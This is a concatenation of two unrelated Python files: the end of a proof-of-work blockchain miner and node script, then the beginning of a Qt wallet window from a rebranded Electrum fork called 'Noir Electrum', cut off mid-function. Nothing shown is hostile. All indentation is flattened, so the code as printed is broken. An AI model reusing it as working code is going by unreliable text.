# prev_hash = prev_hashs.pop(0)
# else:
# break
# c.execute("SELECT * FROM chain WHERE prev_hash = ?", (prev_hash,))
# leaves = c.fetchall()
# n += 1
# if len(leaves) > 0:
# block_height = leaves[0][3]
# if block_height % 1000 == 0:
# print('longest height', block_height)
# for leaf in leaves:
# for the_chain in chains:
# prev_block = the_chain[-1]
# prev_block_hash = prev_block[1]
# # print(prev_block_hash)
# if prev_block_hash == prev_hash:
# forking_chain = copy.copy(the_chain)
# # chain.append(leaf.hash)
# the_chain.append(leaf)
# chains.append(forking_chain)
# break
# leaf_hash = leaf[1]
# if leaf_hash not in prev_hashs and leaf_hash:
# prev_hashs.append(leaf_hash)
# t1 = time.time()
# # print(tree.current_port, "query time", t1-t0, n)
# longest = []
# for i in chains:
# # print(i)
# if not longest:
# longest = i
# if len(longest) < len(i):
# longest = i
# return longest
messages_out = []
def looping():
global messages_out
# print(messages_out)
while messages_out:
message = messages_out.pop(0)
tree.forward(message)
tornado.ioloop.IOLoop.instance().call_later(1, looping)
def miner_looping():
global messages_out
print("messages_out", len(messages_out))
while messages_out:
message = messages_out.pop(0)
if tree.MinerConnector.node_miner:
tree.MinerConnector.node_miner.write_message(tornado.escape.json_encode(message))
tornado.ioloop.IOLoop.instance().call_later(1, miner_looping)
nonce = 0
def mining():
global nonce
global messages_out
# TODO: move to validate
# db = database.get_conn()
# highest_block_hash = db.get(b'chain')
# if highest_block_hash:
# highest_block_json = db.get(b'block%s' % highest_block_hash)
# if highest_block_json:
# highest_block = tornado.escape.json_decode(highest_block_json)
# if chain.highest_block_height < highest_block[chain.HEIGHT]:
# chain.highest_block_hash = highest_block_hash
# chain.highest_block_height = highest_block[chain.HEIGHT]
# chain.nodes_in_chain = copy.copy(chain.frozen_nodes_in_chain)
# for i in chain.recent_longest:
# data = tornado.escape.json_decode(i[8])#.data
# # for j in data.get("nodes", {}):
# # print("recent longest", i.height, j, data["nodes"][j])
# chain.nodes_in_chain.update(data.get("nodes", {}))
# if tree.current_nodeid not in nodes_in_chain and tree.parent_node_id_msg:
# tree.forward(tree.parent_node_id_msg)
# print(tree.current_port, 'parent_node_id_msg', tree.parent_node_id_msg)
if len(chain.recent_longest):
timecost = chain.recent_longest[0][chain.TIMESTAMP] - chain.recent_longest[-1][chain.TIMESTAMP]
if timecost < 1:
timecost = 1
adjust = timecost / (setting.BLOCK_INTERVAL_SECONDS * setting.BLOCK_DIFFICULTY_CYCLE)
if adjust > 4:
adjust = 4
if adjust < 1/4:
adjust = 1/4
difficulty = chain.recent_longest[0][chain.DIFFICULTY]
block_difficulty = 2**difficulty * adjust
else:
block_difficulty = 2**248
now = int(time.time())
last_synctime = now - now % setting.NETWORK_SPREADING_SECONDS - setting.NETWORK_SPREADING_SECONDS
nodes_to_update = {}
for nodeid in tree.nodes_pool:
if tree.nodes_pool[nodeid][1] < last_synctime:
if nodeid not in chain.nodes_in_chain or chain.nodes_in_chain[nodeid][1] < tree.nodes_pool[nodeid][1]:
# print("nodes_to_update", nodeid, nodes_in_chain[nodeid][1], tree.nodes_pool[nodeid][1], last_synctime)
nodes_to_update[nodeid] = tree.nodes_pool[nodeid]
# nodes_in_chain.update(tree.nodes_pool)
# tree.nodes_pool = nodes_in_chain
# print(tree.nodes_pool)
# print(nodes_to_update)
# print(frozen_block_hash, longest)
nodeno = str(tree.nodeid2no(tree.current_nodeid))
pk = tree.node_sk.public_key
if chain.recent_longest:
prev_hash = chain.recent_longest[0][chain.HASH]
height = chain.recent_longest[0][chain.HEIGHT]
identity = chain.recent_longest[0][chain.IDENTITY]
else:
prev_hash, height, identity = '0'*64, 0, ":"
new_difficulty = int(math.log(block_difficulty, 2))
data = {}
data["nodes"] = nodes_to_update
data["proofs"] = list([list(p) for p in chain.last_hash_proofs])
data["subchains"] = chain.last_subchains_block
data_json = tornado.escape.json_encode(data)
# new_identity = "%s@%s:%s" % (tree.current_nodeid, tree.current_host, tree.current_port)
# new_identity = "%s:%s" % (nodeno, pk)
new_identity = pk.to_checksum_address()
new_timestamp = time.time()
if nonce % 1000 == 0:
print(tree.current_port, 'mining', nonce, int(math.log(block_difficulty, 2)), height, len(chain.subchains_block), len(chain.last_subchains_block))
for i in range(100):
block_hash = hashlib.sha256((prev_hash + str(height+1) + str(nonce) + str(new_difficulty) + new_identity + data_json + str(new_timestamp)).encode('utf8')).hexdigest()
if int(block_hash, 16) < block_difficulty:
if chain.recent_longest:
print(tree.current_port, 'height', height, 'nodeid', tree.current_nodeid, 'nonce_init', tree.nodeid2no(tree.current_nodeid), 'timecost', chain.recent_longest[-1][chain.TIMESTAMP] - chain.recent_longest[0][chain.TIMESTAMP])
txid = uuid.uuid4().hex
message = ['NEW_CHAIN_BLOCK', block_hash, prev_hash, height+1, nonce, new_difficulty, new_identity, data, new_timestamp, nodeno, txid]
messages_out.append(message)
print(tree.current_port, "mining", height+1, nonce, block_hash)
nonce = 0
db = database.get_conn()
db.put(b'block%s' % block_hash.encode('utf8'), tornado.escape.json_encode([block_hash, prev_hash, height+1, nonce, new_difficulty, new_identity, data, new_timestamp, nodeno, txid]).encode('utf8'))
db.put(b'chain', block_hash.encode('utf8'))
break
if int(block_hash, 16) < block_difficulty*2:
# if longest:
# print(tree.current_port, 'height', height, 'nodeid', tree.current_nodeid, 'nonce_init', tree.nodeid2no(tree.current_nodeid), 'timecost', longest[-1][7] - longest[0][7])#.timestamp
txid = uuid.uuid4().hex
message = ['NEW_CHAIN_PROOF', block_hash, prev_hash, height+1, nonce, new_difficulty, new_identity, data, new_timestamp, txid]
messages_out.append(message)
nonce += 1
def validate():
global nonce
db = database.get_conn()
highest_block_hash = db.get(b"chain")
if highest_block_hash:
block_json = db.get(b'block%s' % highest_block_hash)
if block_json:
block = tornado.escape.json_decode(block_json)
highest_block_height = block[chain.HEIGHT]
else:
highest_block_hash = b'0'*64
highest_block_height = 0
print("validate nodes_to_fetch", chain.nodes_to_fetch)
c = 0
for nodeid in chain.nodes_to_fetch:
c += 1
new_chain_hash, new_chain_height = chain.fetch_chain(nodeid)
print('validate', highest_block_hash, highest_block_height)
print('validate', new_chain_hash, new_chain_height)
if new_chain_height > highest_block_height:
highest_block_hash = new_chain_hash
highest_block_height = new_chain_height
db.put(b"chain", highest_block_hash)
block_hash = highest_block_hash
chain.recent_longest = []
for i in range(setting.BLOCK_DIFFICULTY_CYCLE):
block_json = db.get(b'block%s' % block_hash)
if block_json:
block = tornado.escape.json_decode(block_json)
block_hash = block[chain.PREV_HASH].encode('utf8')
chain.recent_longest.append(block)
else:
break
for i in range(c):
chain.nodes_to_fetch.pop(0)
if not chain.nodes_to_fetch:
if setting.MINING:
chain.worker_thread_mining = True
nonce = 0
def worker_thread():
while True:
time.sleep(2)
if chain.worker_thread_pause:
continue
if chain.worker_thread_mining:
mining()
continue
if tree.current_nodeid is None:
continue
print('chain validation')
validate()
print('validation done')
# mining_task = tornado.ioloop.PeriodicCallback(mining, 1000) # , jitter=0.5
# mining_task.start()
# print(tree.current_port, "miner")
if __name__ == '__main__':
# print("run python node.py pls")
# tree.current_port = "8001"
tornado.ioloop.IOLoop.instance().call_later(1, miner_looping)
parser = argparse.ArgumentParser(description="python3 node.py --name=<miner_name> [--host=<127.0.0.1>] [--port=<8001>]")
parser.add_argument('--name')
parser.add_argument('--host')
parser.add_argument('--port')
args = parser.parse_args()
if not args.name:
print('--name reqired')
sys.exit()
tree.current_name = args.name
tree.current_host = args.host
tree.current_port = args.port
sk_filename = "miners/%s.key" % tree.current_name
if os.path.exists(sk_filename):
f = open(sk_filename, 'rb')
raw_key = f.read(32)
f.close()
tree.node_sk = eth_keys.keys.PrivateKey(raw_key)
else:
raw_key = secrets.token_bytes(32)
f = open(sk_filename, "wb")
f.write(raw_key)
f.close()
tree.node_sk = eth_keys.keys.PrivateKey(raw_key)
database.main()
setting.MINING = True
tree.MinerConnector(tree.current_host, tree.current_port)
worker_threading = threading.Thread(target=worker_thread)
worker_threading.start()
tornado.ioloop.IOLoop.instance().start()
# worker_threading.join()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.paymentrequest import PR_PAID
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Noir Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Noir Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Noir Electrum Testnet" if constants.net.TESTNET else "Noir Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Noir with it."),
_("Make sure you own the seed phrase or the private keys, before you request Noir to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Noir Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Noir Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://noirofficial.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
